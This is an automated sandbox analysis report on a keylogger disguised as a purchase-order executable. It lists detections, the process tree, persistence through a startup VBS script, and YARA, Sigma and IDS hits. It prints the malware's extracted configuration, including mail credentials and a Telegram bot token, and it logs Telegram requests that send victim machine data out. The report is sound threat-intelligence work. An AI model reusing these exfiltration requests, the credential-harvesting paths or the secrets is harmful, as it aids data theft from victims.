Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New Order RFQ- 19A20060.exe

Overview

General Information

Sample name:New Order RFQ- 19A20060.exe
Analysis ID:1634995
MD5:bb0e884a1d61d8982403d985146a53b0
SHA1:99220984fa9952f20ce470aa5dfd79cb2f1e0ec5
SHA256:cc85605d1ee41144689b669be5d86ceca250714dfbbd043aaa3c368fcbad76b5
Tags:exeuser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sample uses string decryption to hide its real strings
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • New Order RFQ- 19A20060.exe (PID: 7828 cmdline: "C:\Users\user\Desktop\New Order RFQ- 19A20060.exe" MD5: BB0E884A1D61D8982403D985146A53B0)
    • alarmingness.exe (PID: 7844 cmdline: "C:\Users\user\Desktop\New Order RFQ- 19A20060.exe" MD5: BB0E884A1D61D8982403D985146A53B0)
      • RegSvcs.exe (PID: 8012 cmdline: "C:\Users\user\Desktop\New Order RFQ- 19A20060.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 5696 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • alarmingness.exe (PID: 1204 cmdline: "C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe" MD5: BB0E884A1D61D8982403D985146A53B0)
      • RegSvcs.exe (PID: 5840 cmdline: "C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Bot Token": "7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0", "Chat id": "5013849544", "Email ID": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Username": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587", "Token": "7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0", "Chat_id": "5013849544", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2d8be:$a1: get_encryptedPassword
        • 0x2dbdf:$a2: get_encryptedUsername
        • 0x2d6dc:$a3: get_timePasswordChanged
        • 0x2d7d7:$a4: get_passwordField
        • 0x2d8d4:$a5: set_encryptedPassword
        • 0x2efad:$a7: get_logins
        • 0x2eef9:$a10: KeyLoggerEventArgs
        • 0x2eb5e:$a11: KeyLoggerEventArgsEventHandler
        00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmpMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
        • 0x3b691:$a2: \Comodo\Dragon\User Data\Default\Login Data
        • 0x3ad34:$a3: \Google\Chrome\User Data\Default\Login Data
        • 0x3af91:$a4: \Orbitum\User Data\Default\Login Data
        • 0x3b970:$a5: \Kometa\User Data\Default\Login Data
        Click to see the 28 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        10.2.alarmingness.exe.f00000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          10.2.alarmingness.exe.f00000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
            10.2.alarmingness.exe.f00000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              10.2.alarmingness.exe.f00000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x2babe:$a1: get_encryptedPassword
              • 0x2bddf:$a2: get_encryptedUsername
              • 0x2b8dc:$a3: get_timePasswordChanged
              • 0x2b9d7:$a4: get_passwordField
              • 0x2bad4:$a5: set_encryptedPassword
              • 0x2d1ad:$a7: get_logins
              • 0x2d0f9:$a10: KeyLoggerEventArgs
              • 0x2cd5e:$a11: KeyLoggerEventArgsEventHandler
              10.2.alarmingness.exe.f00000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x39891:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x38f34:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x39191:$a4: \Orbitum\User Data\Default\Login Data
              • 0x39b70:$a5: \Kometa\User Data\Default\Login Data
              Click to see the 24 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs" , ProcessId: 5696, ProcessName: wscript.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs" , ProcessId: 5696, ProcessName: wscript.exe

              Data Obfuscation

              barindex
              Sigma detected: Drops script at startup location
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe, ProcessId: 7844, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-11T09:04:47.676123+010028033053Unknown Traffic192.168.2.449716104.21.112.1443TCP
              2025-03-11T09:04:50.530581+010028033053Unknown Traffic192.168.2.449720104.21.112.1443TCP
              2025-03-11T09:04:57.785754+010028033053Unknown Traffic192.168.2.449732104.21.112.1443TCP
              2025-03-11T09:05:20.568450+010028033053Unknown Traffic192.168.2.449746104.21.112.1443TCP
              2025-03-11T09:05:30.450932+010028033053Unknown Traffic192.168.2.449755104.21.112.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-11T09:04:42.754853+010028032742Potentially Bad Traffic192.168.2.449713193.122.6.16880TCP
              2025-03-11T09:04:45.176703+010028032742Potentially Bad Traffic192.168.2.449713193.122.6.16880TCP
              2025-03-11T09:04:48.364232+010028032742Potentially Bad Traffic192.168.2.449718193.122.6.16880TCP
              2025-03-11T09:04:53.473678+010028032742Potentially Bad Traffic192.168.2.449726193.122.6.16880TCP
              2025-03-11T09:04:55.754873+010028032742Potentially Bad Traffic192.168.2.449726193.122.6.16880TCP
              2025-03-11T09:04:58.489348+010028032742Potentially Bad Traffic192.168.2.449734193.122.6.16880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-11T09:05:25.284001+010018100071Potentially Bad Traffic192.168.2.449751149.154.167.220443TCP
              2025-03-11T09:05:34.530217+010018100071Potentially Bad Traffic192.168.2.449756149.154.167.220443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: New Order RFQ- 19A20060.exeAvira: detected
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeAvira: detection malicious, Label: TR/AD.SnakeStealer.jnxyz
              Found malware configuration
              Source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Bot Token": "7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0", "Chat id": "5013849544", "Email ID": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587"}
              Source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587", "Token": "7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0", "Chat_id": "5013849544", "Version": "4.4"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeReversingLabs: Detection: 47%
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeVirustotal: Detection: 38%Perma Link
              Multi AV Scanner detection for submitted file
              Source: New Order RFQ- 19A20060.exeVirustotal: Detection: 38%Perma Link
              Source: New Order RFQ- 19A20060.exeReversingLabs: Detection: 47%
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Sample uses string decryption to hide its real strings
              Source: 11.2.RegSvcs.exe.400000.0.unpackString decryptor: sales-nguyen@vvtrade.vn
              Source: 11.2.RegSvcs.exe.400000.0.unpackString decryptor: qVyP6qyv6MQCmZJBRs4t
              Source: 11.2.RegSvcs.exe.400000.0.unpackString decryptor: mail.vvtrade.vn
              Source: 11.2.RegSvcs.exe.400000.0.unpackString decryptor: saleseuropower@yandex.com
              Source: 11.2.RegSvcs.exe.400000.0.unpackString decryptor: 587
              Source: 11.2.RegSvcs.exe.400000.0.unpackString decryptor: 7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0
              Source: 11.2.RegSvcs.exe.400000.0.unpackString decryptor: 5013849544
              Source: 11.2.RegSvcs.exe.400000.0.unpackString decryptor:

              Location Tracking

              barindex
              Tries to detect the country of the analysis system (by using the IP)
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: New Order RFQ- 19A20060.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49714 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49728 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2
              Source: Binary string: wntdll.pdbUGP source: alarmingness.exe, 00000001.00000003.1206468125.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 00000001.00000003.1207010128.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000003.1316072696.0000000003900000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000003.1315012290.0000000003760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: alarmingness.exe, 00000001.00000003.1206468125.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 00000001.00000003.1207010128.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000003.1316072696.0000000003900000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000003.1315012290.0000000003760000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007A445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_007A445A
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007AC6D1 FindFirstFileW,FindClose,0_2_007AC6D1
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007AC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_007AC75C
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007AEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007AEF95
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007AF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007AF0F2
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007AF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007AF3F3
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007A37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007A37EF
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007A3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007A3B12
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007ABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007ABCBC
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FE445A GetFileAttributesW,FindFirstFileW,FindClose,1_2_00FE445A
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FEC6D1 FindFirstFileW,FindClose,1_2_00FEC6D1
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FEC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_00FEC75C
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FEEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00FEEF95
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FEF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00FEF0F2
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FEF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00FEF3F3
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FE37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00FE37EF
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FE3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00FE3B12
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FEBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00FEBCBC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 028DF8E9h3_2_028DF631
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 028DFD41h3_2_028DFA88
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064931E0h3_2_06492DC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06490D0Dh3_2_06490B30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06491697h3_2_06490B30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06492C19h3_2_06492968
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0649E0A9h3_2_0649DE00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0649E959h3_2_0649E6B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0649F209h3_2_0649EF60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0649CF49h3_2_0649CCA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0649D7F9h3_2_0649D550
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064931E0h3_2_06492DBE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0649E501h3_2_0649E258
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0649EDB1h3_2_0649EB08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0649F661h3_2_0649F3B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06490040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0649FAB9h3_2_0649F810
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0649D3A1h3_2_0649D0F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064931E0h3_2_0649310E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0649DC51h3_2_0649D9A8

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49751 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49756 -> 149.154.167.220:443
              Uses the Telegram API (likely for C&C communication)
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/03/2025%20/%2003:21:21%0D%0ACountry%20Name:%20United%20States%0D%0A[%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2012/03/2025%20/%2023:34:06%0D%0ACountry%20Name:%20United%20States%0D%0A[%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
              Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
              Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49718 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49713 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49726 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49716 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49755 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49720 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 104.21.112.1:443
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
